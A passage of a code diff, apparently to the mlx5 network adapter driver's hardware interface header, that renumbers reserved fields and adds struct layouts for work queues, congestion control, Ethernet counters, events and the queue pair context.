u8 reserved_31[0x1]; u8 apm[0x1]; - u8 reserved_29[0x7]; + u8 reserved_32[0x7]; u8 qkv[0x1]; u8 pkv[0x1]; - u8 reserved_30[0x4]; + u8 reserved_33[0x4]; u8 xrc[0x1]; u8 ud[0x1]; u8 uc[0x1]; u8 rc[0x1]; - u8 reserved_31[0xa]; + u8 reserved_34[0xa]; u8 uar_sz[0x6]; - u8 reserved_32[0x8]; + u8 reserved_35[0x8]; u8 log_pg_sz[0x8]; u8 bf[0x1]; - u8 reserved_33[0xa]; + u8 reserved_36[0x1]; + u8 pad_tx_eth_packet[0x1]; + u8 reserved_37[0x8]; u8 log_bf_reg_size[0x5]; - u8 reserved_34[0x10]; + u8 reserved_38[0x10]; - u8 reserved_35[0x10]; + u8 reserved_39[0x10]; u8 max_wqe_sz_sq[0x10]; - u8 reserved_36[0x10]; + u8 
reserved_40[0x10]; u8 max_wqe_sz_rq[0x10]; - u8 reserved_37[0x10]; + u8 reserved_41[0x10]; u8 max_wqe_sz_sq_dc[0x10]; - u8 reserved_38[0x7]; + u8 reserved_42[0x7]; u8 max_qp_mcg[0x19]; - u8 reserved_39[0x18]; + u8 reserved_43[0x18]; u8 log_max_mcg[0x8]; - u8 reserved_40[0xb]; + u8 reserved_44[0x3]; + u8 log_max_transport_domain[0x5]; + u8 reserved_45[0x3]; u8 log_max_pd[0x5]; - u8 reserved_41[0xb]; + u8 reserved_46[0xb]; u8 log_max_xrcd[0x5]; - u8 reserved_42[0x20]; + u8 reserved_47[0x20]; - u8 reserved_43[0x3]; + u8 reserved_48[0x3]; u8 log_max_rq[0x5]; - u8 reserved_44[0x3]; + u8 reserved_49[0x3]; u8 log_max_sq[0x5]; - u8 reserved_45[0x3]; + u8 reserved_50[0x3]; u8 log_max_tir[0x5]; - u8 reserved_46[0x3]; + u8 reserved_51[0x3]; u8 log_max_tis[0x5]; - u8 reserved_47[0x13]; - u8 log_max_rq_per_tir[0x5]; - u8 reserved_48[0x3]; + u8 basic_cyclic_rcv_wqe[0x1]; + u8 reserved_52[0x2]; + u8 log_max_rmp[0x5]; + u8 reserved_53[0x3]; + u8 log_max_rqt[0x5]; + u8 reserved_54[0x3]; + u8 log_max_rqt_size[0x5]; + u8 reserved_55[0x3]; u8 log_max_tis_per_sq[0x5]; - u8 reserved_49[0xe0]; + u8 reserved_56[0x3]; + u8 log_max_stride_sz_rq[0x5]; + u8 reserved_57[0x3]; + u8 log_min_stride_sz_rq[0x5]; + u8 reserved_58[0x3]; + u8 log_max_stride_sz_sq[0x5]; + u8 reserved_59[0x3]; + u8 log_min_stride_sz_sq[0x5]; + + u8 reserved_60[0x1b]; + u8 log_max_wq_sz[0x5]; + + u8 reserved_61[0xa0]; - u8 reserved_50[0x10]; + u8 reserved_62[0x3]; + u8 log_max_l2_table[0x5]; + u8 reserved_63[0x8]; u8 log_uar_page_sz[0x10]; - u8 reserved_51[0x100]; + u8 reserved_64[0x100]; - u8 reserved_52[0x1f]; + u8 reserved_65[0x1f]; u8 cqe_zip[0x1]; u8 cqe_zip_timeout[0x10]; u8 cqe_zip_max_num[0x10]; - u8 reserved_53[0x220]; + u8 reserved_66[0x220]; }; -struct mlx5_ifc_set_hca_cap_in_bits { - u8 opcode[0x10]; - u8 reserved_0[0x10]; +enum { + MLX5_DEST_FORMAT_STRUCT_DESTINATION_TYPE_FLOW_TABLE_ = 0x1, + MLX5_DEST_FORMAT_STRUCT_DESTINATION_TYPE_TIR = 0x2, +}; - u8 reserved_1[0x10]; - u8 op_mod[0x10]; +struct mlx5_ifc_dest_format_struct_bits { + u8 destination_type[0x8]; + u8 destination_id[0x18]; - u8 reserved_2[0x40]; + u8 reserved_0[0x20]; +}; + +struct mlx5_ifc_fte_match_param_bits { + struct mlx5_ifc_fte_match_set_lyr_2_4_bits outer_headers; + + struct mlx5_ifc_fte_match_set_misc_bits misc_parameters; + + struct mlx5_ifc_fte_match_set_lyr_2_4_bits inner_headers; - struct mlx5_ifc_cmd_hca_cap_bits hca_capability_struct; + u8 reserved_0[0xa00]; }; -struct mlx5_ifc_query_hca_cap_in_bits { - u8 opcode[0x10]; - u8 reserved_0[0x10]; +enum { + MLX5_RX_HASH_FIELD_SELECT_SELECTED_FIELDS_SRC_IP = 0x0, + MLX5_RX_HASH_FIELD_SELECT_SELECTED_FIELDS_DST_IP = 0x1, + MLX5_RX_HASH_FIELD_SELECT_SELECTED_FIELDS_L4_SPORT = 0x2, + MLX5_RX_HASH_FIELD_SELECT_SELECTED_FIELDS_L4_DPORT = 0x3, + MLX5_RX_HASH_FIELD_SELECT_SELECTED_FIELDS_IPSEC_SPI = 0x4, +}; - u8 reserved_1[0x10]; - u8 op_mod[0x10]; +struct mlx5_ifc_rx_hash_field_select_bits { + u8 l3_prot_type[0x1]; + u8 l4_prot_type[0x1]; + u8 selected_fields[0x1e]; +}; - u8 reserved_2[0x40]; +enum { + MLX5_WQ_WQ_TYPE_WQ_LINKED_LIST = 0x0, + MLX5_WQ_WQ_TYPE_WQ_CYCLIC = 0x1, }; -struct mlx5_ifc_query_hca_cap_out_bits { - u8 status[0x8]; +enum { + MLX5_WQ_END_PADDING_MODE_END_PAD_NONE = 0x0, + MLX5_WQ_END_PADDING_MODE_END_PAD_ALIGN = 0x1, +}; + +struct mlx5_ifc_wq_bits { + u8 wq_type[0x4]; + u8 wq_signature[0x1]; + u8 end_padding_mode[0x2]; + u8 cd_slave[0x1]; u8 reserved_0[0x18]; - u8 syndrome[0x20]; + u8 hds_skip_first_sge[0x1]; + u8 log2_hds_buf_size[0x3]; + u8 reserved_1[0x7]; + u8 page_offset[0x5]; + u8 lwm[0x10]; 
- u8 reserved_1[0x40]; + u8 reserved_2[0x8]; + u8 pd[0x18]; + + u8 reserved_3[0x8]; + u8 uar_page[0x18]; + + u8 dbr_addr[0x40]; + + u8 hw_counter[0x20]; + + u8 sw_counter[0x20]; + + u8 reserved_4[0xc]; + u8 log_wq_stride[0x4]; + u8 reserved_5[0x3]; + u8 log_wq_pg_sz[0x5]; + u8 reserved_6[0x3]; + u8 log_wq_sz[0x5]; + + u8 reserved_7[0x4e0]; - u8 capability_struct[256][0x8]; + struct mlx5_ifc_cmd_pas_bits pas[0]; }; -struct mlx5_ifc_set_hca_cap_out_bits { - u8 status[0x8]; - u8 reserved_0[0x18]; +struct mlx5_ifc_rq_num_bits { + u8 reserved_0[0x8]; + u8 rq_num[0x18]; +}; - u8 syndrome[0x20]; +struct mlx5_ifc_mac_address_layout_bits { + u8 reserved_0[0x10]; + u8 mac_addr_47_32[0x10]; - u8 reserved_1[0x40]; + u8 mac_addr_31_0[0x20]; +}; + +struct mlx5_ifc_cong_control_r_roce_ecn_np_bits { + u8 reserved_0[0xa0]; + + u8 min_time_between_cnps[0x20]; + + u8 reserved_1[0x12]; + u8 cnp_dscp[0x6]; + u8 reserved_2[0x5]; + u8 cnp_802p_prio[0x3]; + + u8 reserved_3[0x720]; +}; + +struct mlx5_ifc_cong_control_r_roce_ecn_rp_bits { + u8 reserved_0[0x60]; + + u8 reserved_1[0x4]; + u8 clamp_tgt_rate[0x1]; + u8 reserved_2[0x3]; + u8 clamp_tgt_rate_after_time_inc[0x1]; + u8 reserved_3[0x17]; + + u8 reserved_4[0x20]; + + u8 rpg_time_reset[0x20]; + + u8 rpg_byte_reset[0x20]; + + u8 rpg_threshold[0x20]; + + u8 rpg_max_rate[0x20]; + + u8 rpg_ai_rate[0x20]; + + u8 rpg_hai_rate[0x20]; + + u8 rpg_gd[0x20]; + + u8 rpg_min_dec_fac[0x20]; + + u8 rpg_min_rate[0x20]; + + u8 reserved_5[0xe0]; + + u8 rate_to_set_on_first_cnp[0x20]; + + u8 dce_tcp_g[0x20]; + + u8 dce_tcp_rtt[0x20]; + + u8 rate_reduce_monitor_period[0x20]; + + u8 reserved_6[0x20]; + + u8 initial_alpha_value[0x20]; + + u8 reserved_7[0x4a0]; +}; + +struct mlx5_ifc_cong_control_802_1qau_rp_bits { + u8 reserved_0[0x80]; + + u8 rppp_max_rps[0x20]; + + u8 rpg_time_reset[0x20]; + + u8 rpg_byte_reset[0x20]; + + u8 rpg_threshold[0x20]; + + u8 rpg_max_rate[0x20]; + + u8 rpg_ai_rate[0x20]; + + u8 rpg_hai_rate[0x20]; + + u8 rpg_gd[0x20]; + + u8 rpg_min_dec_fac[0x20]; + + u8 rpg_min_rate[0x20]; + + u8 reserved_1[0x640]; +}; + +enum { + MLX5_RESIZE_FIELD_SELECT_RESIZE_FIELD_SELECT_LOG_CQ_SIZE = 0x1, + MLX5_RESIZE_FIELD_SELECT_RESIZE_FIELD_SELECT_PAGE_OFFSET = 0x2, + MLX5_RESIZE_FIELD_SELECT_RESIZE_FIELD_SELECT_LOG_PAGE_SIZE = 0x4, +}; + +struct mlx5_ifc_resize_field_select_bits { + u8 resize_field_select[0x20]; +}; + +enum { + MLX5_MODIFY_FIELD_SELECT_MODIFY_FIELD_SELECT_CQ_PERIOD = 0x1, + MLX5_MODIFY_FIELD_SELECT_MODIFY_FIELD_SELECT_CQ_MAX_COUNT = 0x2, + MLX5_MODIFY_FIELD_SELECT_MODIFY_FIELD_SELECT_OI = 0x4, + MLX5_MODIFY_FIELD_SELECT_MODIFY_FIELD_SELECT_C_EQN = 0x8, +}; + +struct mlx5_ifc_modify_field_select_bits { + u8 modify_field_select[0x20]; +}; + +struct mlx5_ifc_field_select_r_roce_np_bits { + u8 field_select_r_roce_np[0x20]; +}; + +struct mlx5_ifc_field_select_r_roce_rp_bits { + u8 field_select_r_roce_rp[0x20]; +}; + +enum { + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPPP_MAX_RPS = 0x4, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_TIME_RESET = 0x8, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_BYTE_RESET = 0x10, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_THRESHOLD = 0x20, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_MAX_RATE = 0x40, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_AI_RATE = 0x80, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_HAI_RATE = 0x100, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_GD = 0x200, + 
MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_MIN_DEC_FAC = 0x400, + MLX5_FIELD_SELECT_802_1QAU_RP_FIELD_SELECT_8021QAURP_RPG_MIN_RATE = 0x800, +}; + +struct mlx5_ifc_field_select_802_1qau_rp_bits { + u8 field_select_8021qaurp[0x20]; +}; + +struct mlx5_ifc_phys_layer_cntrs_bits { + u8 time_since_last_clear_high[0x20]; + + u8 time_since_last_clear_low[0x20]; + + u8 symbol_errors_high[0x20]; + + u8 symbol_errors_low[0x20]; + + u8 sync_headers_errors_high[0x20]; + + u8 sync_headers_errors_low[0x20]; + + u8 edpl_bip_errors_lane0_high[0x20]; + + u8 edpl_bip_errors_lane0_low[0x20]; + + u8 edpl_bip_errors_lane1_high[0x20]; + + u8 edpl_bip_errors_lane1_low[0x20]; + + u8 edpl_bip_errors_lane2_high[0x20]; + + u8 edpl_bip_errors_lane2_low[0x20]; + + u8 edpl_bip_errors_lane3_high[0x20]; + + u8 edpl_bip_errors_lane3_low[0x20]; + + u8 fc_fec_corrected_blocks_lane0_high[0x20]; + + u8 fc_fec_corrected_blocks_lane0_low[0x20]; + + u8 fc_fec_corrected_blocks_lane1_high[0x20]; + + u8 fc_fec_corrected_blocks_lane1_low[0x20]; + + u8 fc_fec_corrected_blocks_lane2_high[0x20]; + + u8 fc_fec_corrected_blocks_lane2_low[0x20]; + + u8 fc_fec_corrected_blocks_lane3_high[0x20]; + + u8 fc_fec_corrected_blocks_lane3_low[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane0_high[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane0_low[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane1_high[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane1_low[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane2_high[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane2_low[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane3_high[0x20]; + + u8 fc_fec_uncorrectable_blocks_lane3_low[0x20]; + + u8 rs_fec_corrected_blocks_high[0x20]; + + u8 rs_fec_corrected_blocks_low[0x20]; + + u8 rs_fec_uncorrectable_blocks_high[0x20]; + + u8 rs_fec_uncorrectable_blocks_low[0x20]; + + u8 rs_fec_no_errors_blocks_high[0x20]; + + u8 rs_fec_no_errors_blocks_low[0x20]; + + u8 rs_fec_single_error_blocks_high[0x20]; + + u8 rs_fec_single_error_blocks_low[0x20]; + + u8 rs_fec_corrected_symbols_total_high[0x20]; + + u8 rs_fec_corrected_symbols_total_low[0x20]; + + u8 rs_fec_corrected_symbols_lane0_high[0x20]; + + u8 rs_fec_corrected_symbols_lane0_low[0x20]; + + u8 rs_fec_corrected_symbols_lane1_high[0x20]; + + u8 rs_fec_corrected_symbols_lane1_low[0x20]; + + u8 rs_fec_corrected_symbols_lane2_high[0x20]; + + u8 rs_fec_corrected_symbols_lane2_low[0x20]; + + u8 rs_fec_corrected_symbols_lane3_high[0x20]; + + u8 rs_fec_corrected_symbols_lane3_low[0x20]; + + u8 link_down_events[0x20]; + + u8 successful_recovery_events[0x20]; + + u8 reserved_0[0x180]; +}; + +struct mlx5_ifc_eth_per_traffic_grp_data_layout_bits { + u8 transmit_queue_high[0x20]; + + u8 transmit_queue_low[0x20]; + + u8 reserved_0[0x780]; +}; + +struct mlx5_ifc_eth_per_prio_grp_data_layout_bits { + u8 rx_octets_high[0x20]; + + u8 rx_octets_low[0x20]; + + u8 reserved_0[0xc0]; + + u8 rx_frames_high[0x20]; + + u8 rx_frames_low[0x20]; + + u8 tx_octets_high[0x20]; + + u8 tx_octets_low[0x20]; + + u8 reserved_1[0xc0]; + + u8 tx_frames_high[0x20]; + + u8 tx_frames_low[0x20]; + + u8 rx_pause_high[0x20]; + + u8 rx_pause_low[0x20]; + + u8 rx_pause_duration_high[0x20]; + + u8 rx_pause_duration_low[0x20]; + + u8 tx_pause_high[0x20]; + + u8 tx_pause_low[0x20]; + + u8 tx_pause_duration_high[0x20]; + + u8 tx_pause_duration_low[0x20]; + + u8 rx_pause_transition_high[0x20]; + + u8 rx_pause_transition_low[0x20]; + + u8 reserved_2[0x400]; +}; + +struct mlx5_ifc_eth_extended_cntrs_grp_data_layout_bits { + u8 port_transmit_wait_high[0x20]; + + u8 
port_transmit_wait_low[0x20]; + + u8 reserved_0[0x780]; +}; + +struct mlx5_ifc_eth_3635_cntrs_grp_data_layout_bits { + u8 dot3stats_alignment_errors_high[0x20]; + + u8 dot3stats_alignment_errors_low[0x20]; + + u8 dot3stats_fcs_errors_high[0x20]; + + u8 dot3stats_fcs_errors_low[0x20]; + + u8 dot3stats_single_collision_frames_high[0x20]; + + u8 dot3stats_single_collision_frames_low[0x20]; + + u8 dot3stats_multiple_collision_frames_high[0x20]; + + u8 dot3stats_multiple_collision_frames_low[0x20]; + + u8 dot3stats_sqe_test_errors_high[0x20]; + + u8 dot3stats_sqe_test_errors_low[0x20]; + + u8 dot3stats_deferred_transmissions_high[0x20]; + + u8 dot3stats_deferred_transmissions_low[0x20]; + + u8 dot3stats_late_collisions_high[0x20]; + + u8 dot3stats_late_collisions_low[0x20]; + + u8 dot3stats_excessive_collisions_high[0x20]; + + u8 dot3stats_excessive_collisions_low[0x20]; + + u8 dot3stats_internal_mac_transmit_errors_high[0x20]; + + u8 dot3stats_internal_mac_transmit_errors_low[0x20]; + + u8 dot3stats_carrier_sense_errors_high[0x20]; + + u8 dot3stats_carrier_sense_errors_low[0x20]; + + u8 dot3stats_frame_too_longs_high[0x20]; + + u8 dot3stats_frame_too_longs_low[0x20]; + + u8 dot3stats_internal_mac_receive_errors_high[0x20]; + + u8 dot3stats_internal_mac_receive_errors_low[0x20]; + + u8 dot3stats_symbol_errors_high[0x20]; + + u8 dot3stats_symbol_errors_low[0x20]; + + u8 dot3control_in_unknown_opcodes_high[0x20]; + + u8 dot3control_in_unknown_opcodes_low[0x20]; + + u8 dot3in_pause_frames_high[0x20]; + + u8 dot3in_pause_frames_low[0x20]; + + u8 dot3out_pause_frames_high[0x20]; + + u8 dot3out_pause_frames_low[0x20]; + + u8 reserved_0[0x3c0]; +}; + +struct mlx5_ifc_eth_2819_cntrs_grp_data_layout_bits { + u8 ether_stats_drop_events_high[0x20]; + + u8 ether_stats_drop_events_low[0x20]; + + u8 ether_stats_octets_high[0x20]; + + u8 ether_stats_octets_low[0x20]; + + u8 ether_stats_pkts_high[0x20]; + + u8 ether_stats_pkts_low[0x20]; + + u8 ether_stats_broadcast_pkts_high[0x20]; + + u8 ether_stats_broadcast_pkts_low[0x20]; + + u8 ether_stats_multicast_pkts_high[0x20]; + + u8 ether_stats_multicast_pkts_low[0x20]; + + u8 ether_stats_crc_align_errors_high[0x20]; + + u8 ether_stats_crc_align_errors_low[0x20]; + + u8 ether_stats_undersize_pkts_high[0x20]; + + u8 ether_stats_undersize_pkts_low[0x20]; + + u8 ether_stats_oversize_pkts_high[0x20]; + + u8 ether_stats_oversize_pkts_low[0x20]; + + u8 ether_stats_fragments_high[0x20]; + + u8 ether_stats_fragments_low[0x20]; + + u8 ether_stats_jabbers_high[0x20]; + + u8 ether_stats_jabbers_low[0x20]; + + u8 ether_stats_collisions_high[0x20]; + + u8 ether_stats_collisions_low[0x20]; + + u8 ether_stats_pkts64octets_high[0x20]; + + u8 ether_stats_pkts64octets_low[0x20]; + + u8 ether_stats_pkts65to127octets_high[0x20]; + + u8 ether_stats_pkts65to127octets_low[0x20]; + + u8 ether_stats_pkts128to255octets_high[0x20]; + + u8 ether_stats_pkts128to255octets_low[0x20]; + + u8 ether_stats_pkts256to511octets_high[0x20]; + + u8 ether_stats_pkts256to511octets_low[0x20]; + + u8 ether_stats_pkts512to1023octets_high[0x20]; + + u8 ether_stats_pkts512to1023octets_low[0x20]; + + u8 ether_stats_pkts1024to1518octets_high[0x20]; + + u8 ether_stats_pkts1024to1518octets_low[0x20]; + + u8 ether_stats_pkts1519to2047octets_high[0x20]; + + u8 ether_stats_pkts1519to2047octets_low[0x20]; + + u8 ether_stats_pkts2048to4095octets_high[0x20]; + + u8 ether_stats_pkts2048to4095octets_low[0x20]; + + u8 ether_stats_pkts4096to8191octets_high[0x20]; + + u8 ether_stats_pkts4096to8191octets_low[0x20]; + + u8 
ether_stats_pkts8192to10239octets_high[0x20]; + + u8 ether_stats_pkts8192to10239octets_low[0x20]; + + u8 reserved_0[0x280]; +}; + +struct mlx5_ifc_eth_2863_cntrs_grp_data_layout_bits { + u8 if_in_octets_high[0x20]; + + u8 if_in_octets_low[0x20]; + + u8 if_in_ucast_pkts_high[0x20]; + + u8 if_in_ucast_pkts_low[0x20]; + + u8 if_in_discards_high[0x20]; + + u8 if_in_discards_low[0x20]; + + u8 if_in_errors_high[0x20]; + + u8 if_in_errors_low[0x20]; + + u8 if_in_unknown_protos_high[0x20]; + + u8 if_in_unknown_protos_low[0x20]; + + u8 if_out_octets_high[0x20]; + + u8 if_out_octets_low[0x20]; + + u8 if_out_ucast_pkts_high[0x20]; + + u8 if_out_ucast_pkts_low[0x20]; + + u8 if_out_discards_high[0x20]; + + u8 if_out_discards_low[0x20]; + + u8 if_out_errors_high[0x20]; + + u8 if_out_errors_low[0x20]; + + u8 if_in_multicast_pkts_high[0x20]; + + u8 if_in_multicast_pkts_low[0x20]; + + u8 if_in_broadcast_pkts_high[0x20]; + + u8 if_in_broadcast_pkts_low[0x20]; + + u8 if_out_multicast_pkts_high[0x20]; + + u8 if_out_multicast_pkts_low[0x20]; + + u8 if_out_broadcast_pkts_high[0x20]; + + u8 if_out_broadcast_pkts_low[0x20]; + + u8 reserved_0[0x480]; +}; + +struct mlx5_ifc_eth_802_3_cntrs_grp_data_layout_bits { + u8 a_frames_transmitted_ok_high[0x20]; + + u8 a_frames_transmitted_ok_low[0x20]; + + u8 a_frames_received_ok_high[0x20]; + + u8 a_frames_received_ok_low[0x20]; + + u8 a_frame_check_sequence_errors_high[0x20]; + + u8 a_frame_check_sequence_errors_low[0x20]; + + u8 a_alignment_errors_high[0x20]; + + u8 a_alignment_errors_low[0x20]; + + u8 a_octets_transmitted_ok_high[0x20]; + + u8 a_octets_transmitted_ok_low[0x20]; + + u8 a_octets_received_ok_high[0x20]; + + u8 a_octets_received_ok_low[0x20]; + + u8 a_multicast_frames_xmitted_ok_high[0x20]; + + u8 a_multicast_frames_xmitted_ok_low[0x20]; + + u8 a_broadcast_frames_xmitted_ok_high[0x20]; + + u8 a_broadcast_frames_xmitted_ok_low[0x20]; + + u8 a_multicast_frames_received_ok_high[0x20]; + + u8 a_multicast_frames_received_ok_low[0x20]; + + u8 a_broadcast_frames_received_ok_high[0x20]; + + u8 a_broadcast_frames_received_ok_low[0x20]; + + u8 a_in_range_length_errors_high[0x20]; + + u8 a_in_range_length_errors_low[0x20]; + + u8 a_out_of_range_length_field_high[0x20]; + + u8 a_out_of_range_length_field_low[0x20]; + + u8 a_frame_too_long_errors_high[0x20]; + + u8 a_frame_too_long_errors_low[0x20]; + + u8 a_symbol_error_during_carrier_high[0x20]; + + u8 a_symbol_error_during_carrier_low[0x20]; + + u8 a_mac_control_frames_transmitted_high[0x20]; + + u8 a_mac_control_frames_transmitted_low[0x20]; + + u8 a_mac_control_frames_received_high[0x20]; + + u8 a_mac_control_frames_received_low[0x20]; + + u8 a_unsupported_opcodes_received_high[0x20]; + + u8 a_unsupported_opcodes_received_low[0x20]; + + u8 a_pause_mac_ctrl_frames_received_high[0x20]; + + u8 a_pause_mac_ctrl_frames_received_low[0x20]; + + u8 a_pause_mac_ctrl_frames_transmitted_high[0x20]; + + u8 a_pause_mac_ctrl_frames_transmitted_low[0x20]; + + u8 reserved_0[0x300]; +}; + +struct mlx5_ifc_cmd_inter_comp_event_bits { + u8 command_completion_vector[0x20]; + + u8 reserved_0[0xc0]; +}; + +struct mlx5_ifc_stall_vl_event_bits { + u8 reserved_0[0x18]; + u8 port_num[0x1]; + u8 reserved_1[0x3]; + u8 vl[0x4]; + + u8 reserved_2[0xa0]; +}; + +struct mlx5_ifc_db_bf_congestion_event_bits { + u8 event_subtype[0x8]; + u8 reserved_0[0x8]; + u8 congestion_level[0x8]; + u8 reserved_1[0x8]; + + u8 reserved_2[0xa0]; +}; + +struct mlx5_ifc_gpio_event_bits { + u8 reserved_0[0x60]; + + u8 gpio_event_hi[0x20]; + + u8 gpio_event_lo[0x20]; + 
+ u8 reserved_1[0x40]; +}; + +struct mlx5_ifc_port_state_change_event_bits { + u8 reserved_0[0x40]; + + u8 port_num[0x4]; + u8 reserved_1[0x1c]; + + u8 reserved_2[0x80]; +}; + +struct mlx5_ifc_dropped_packet_logged_bits { + u8 reserved_0[0xe0]; +}; + +enum { + MLX5_CQ_ERROR_SYNDROME_CQ_OVERRUN = 0x1, + MLX5_CQ_ERROR_SYNDROME_CQ_ACCESS_VIOLATION_ERROR = 0x2, +}; + +struct mlx5_ifc_cq_error_bits { + u8 reserved_0[0x8]; + u8 cqn[0x18]; + + u8 reserved_1[0x20]; + + u8 reserved_2[0x18]; + u8 syndrome[0x8]; + + u8 reserved_3[0x80]; +}; + +struct mlx5_ifc_rdma_page_fault_event_bits { + u8 bytes_committed[0x20]; + + u8 r_key[0x20]; + + u8 reserved_0[0x10]; + u8 packet_len[0x10]; + + u8 rdma_op_len[0x20]; + + u8 rdma_va[0x40]; + + u8 reserved_1[0x5]; + u8 rdma[0x1]; + u8 write[0x1]; + u8 requestor[0x1]; + u8 qp_number[0x18]; +}; + +struct mlx5_ifc_wqe_associated_page_fault_event_bits { + u8 bytes_committed[0x20]; + + u8 reserved_0[0x10]; + u8 wqe_index[0x10]; + + u8 reserved_1[0x10]; + u8 len[0x10]; + + u8 reserved_2[0x60]; + + u8 reserved_3[0x5]; + u8 rdma[0x1]; + u8 write_read[0x1]; + u8 requestor[0x1]; + u8 qpn[0x18]; +}; + +struct mlx5_ifc_qp_events_bits { + u8 reserved_0[0xa0]; + + u8 type[0x8]; + u8 reserved_1[0x18]; + + u8 reserved_2[0x8]; + u8 qpn_rqn_sqn[0x18]; +}; + +struct mlx5_ifc_dct_events_bits { + u8 reserved_0[0xc0]; + + u8 reserved_1[0x8]; + u8 dct_number[0x18]; +}; + +struct mlx5_ifc_comp_event_bits { + u8 reserved_0[0xc0]; + + u8 reserved_1[0x8]; + u8 cq_number[0x18]; +}; + +enum { + MLX5_QPC_STATE_RST = 0x0, + MLX5_QPC_STATE_INIT = 0x1, + MLX5_QPC_STATE_RTR = 0x2, + MLX5_QPC_STATE_RTS = 0x3, + MLX5_QPC_STATE_SQER = 0x4, + MLX5_QPC_STATE_ERR = 0x6, + MLX5_QPC_STATE_SQD = 0x7, + MLX5_QPC_STATE_SUSPENDED = 0x9, +}; + +enum { + MLX5_QPC_ST_RC = 0x0, + MLX5_QPC_ST_UC = 0x1, + MLX5_QPC_ST_UD = 0x2, + MLX5_QPC_ST_XRC = 0x3, + MLX5_QPC_ST_DCI = 0x5, + MLX5_QPC_ST_QP0 = 0x7, + MLX5_QPC_ST_QP1 = 0x8, + MLX5_QPC_ST_RAW_DATAGRAM = 0x9, + MLX5_QPC_ST_REG_UMR = 0xc, +}; + +enum { + MLX5_QPC_PM_STATE_ARMED = 0x0, + MLX5_QPC_PM_STATE_REARM = 0x1, + MLX5_QPC_PM_STATE_RESERVED = 0x2, + MLX5_QPC_PM_STATE_MIGRATED = 0x3, +}; + +enum { + MLX5_QPC_END_PADDING_MODE_SCATTER_AS_IS = 0x0, + MLX5_QPC_END_PADDING_MODE_PAD_TO_CACHE_LINE_ALIGNMENT = 0x1, +}; + +enum { + MLX5_QPC_MTU_256_BYTES = 0x1, + MLX5_QPC_MTU_512_BYTES = 0x2, + MLX5_QPC_MTU_1K_BYTES = 0x3, + MLX5_QPC_MTU_2K_BYTES = 0x4, + MLX5_QPC_MTU_4K_BYTES = 0x5, + MLX5_QPC_MTU_RAW_ETHERNET_QP = 0x7, +}; + +enum { + MLX5_QPC_ATOMIC_MODE_IB_SPEC = 0x1, + MLX5_QPC_ATOMIC_MODE_ONLY_8B = 0x2, + MLX5_QPC_ATOMIC_MODE_UP_TO_8B = 0x3, + MLX5_QPC_ATOMIC_MODE_UP_TO_16B = 0x4, + MLX5_QPC_ATOMIC_MODE_UP_TO_32B = 0x5, + MLX5_QPC_ATOMIC_MODE_UP_TO_64B = 0x6, + MLX5_QPC_ATOMIC_MODE_UP_TO_128B = 0x7, + MLX5_QPC_ATOMIC_MODE_UP_TO_256B = 0x8, +}; + +enum { + MLX5_QPC_CS_REQ_DISABLE = 0x0, + MLX5_QPC_CS_REQ_UP_TO_32B = 0x11, + MLX5_QPC_CS_REQ_UP_TO_64B = 0x22, +}; + +enum { + MLX5_QPC_CS_RES_DISABLE = 0x0, + MLX5_QPC_CS_RES_UP_TO_32B = 0x1, + MLX5_QPC_CS_RES_UP_TO_64B = 0x2, +}; + +struct mlx5_ifc_qpc_bits { + u8 state[0x4]; + u8 reserved_0[0x4]; + u8 st[0x8]; + u8 reserved_1[0x3]; + u8 pm_state[0x2]; + u8 reserved_2[0x7]; + u8 end_padding_mode[0x2]; + u8 reserved_3[0x2]; + + u8 wq_signature[0x1]; + u8 block_lb_mc[0x1]; + u8 atomic_like_write_en[0x1]; + u8 latency_sensitive[0x1]; + u8 reserved_4[0x1]; + u8 drain_sigerr[0x1]; + u8 reserved_5[0x2]; + u8 pd[0x18]; + + u8 mtu[0x3]; + u8 log_msg_max[0x5]; + u8 reserved_6[0x1]; + u8 log_rq_size[0x4]; + u8 
log_rq_stride[0x3]; + u8 no_sq[0x1]; + u8 log_sq_size[0x4]; + u8 reserved_7[0x6]; + u8 rlky[0x1]; + u8 reserved_8[0x4]; + + u8 counter_set_id[0x8]; + u8 uar_page[0x18]; + + u8 reserved_9[0x8]; + u8 user_index[0x18]; + + u8 reserved_10[0x3]; + u8 log_page_size[0x5]; + u8 remote_qpn[0x18]; + + struct mlx5_ifc_ads_bits primary_address_path; + + struct mlx5_ifc_ads_bits secondary_address_path; + + u8 log_ack_req_freq[0x4]; + u8 reserved_11[0x4]; + u8 log_sra_max[0x3]; + u8 reserved_12[0x2]; + u8 retry_count[0x3]; + u8 rnr_retry[0x3]; + u8 reserved_13[0x1]; + u8 fre[0x1]; + u8 cur_rnr_retry[0x3]; + u8 cur_retry_count[0x3]; + u8 reserved_14[0x5]; + + u8 reserved_15[0x20]; + + u8 reserved_16[0x8]; + u8 next_send_psn[0x18]; + + u8 reserved_17[0x8]; + u8 cqn_snd[0x18]; + + u8 reserved_18[0x40]; + + u8 reserved_19[0x8]; + u8 last_acked_psn[0x18]; + + u8 reserved_20[0x8]; + u8 ssn[0x18]; + + u8 reserved_21[0x8]; + u8 log_rra_max[0x3]; + u8 reserved_22[0x1]; + u8 atomic_mode[0x4]; + u8 rre[0x1]; + u8 rwe[0x1]; + u8 rae[0x1]; + u8 reserved_23[0x1]; + u8 page_offset[0x6]; + u8 reserved_24[0x3]; + u8 cd_slave_receive[0x1]; + u8 cd_slave_send[0x1]; + u8 cd_master[0x1]; + + u8 reserved_25[0x3]; + u8 min_rnr_nak[0x5]; + u8 next_rcv_psn[0x18]; + + u8 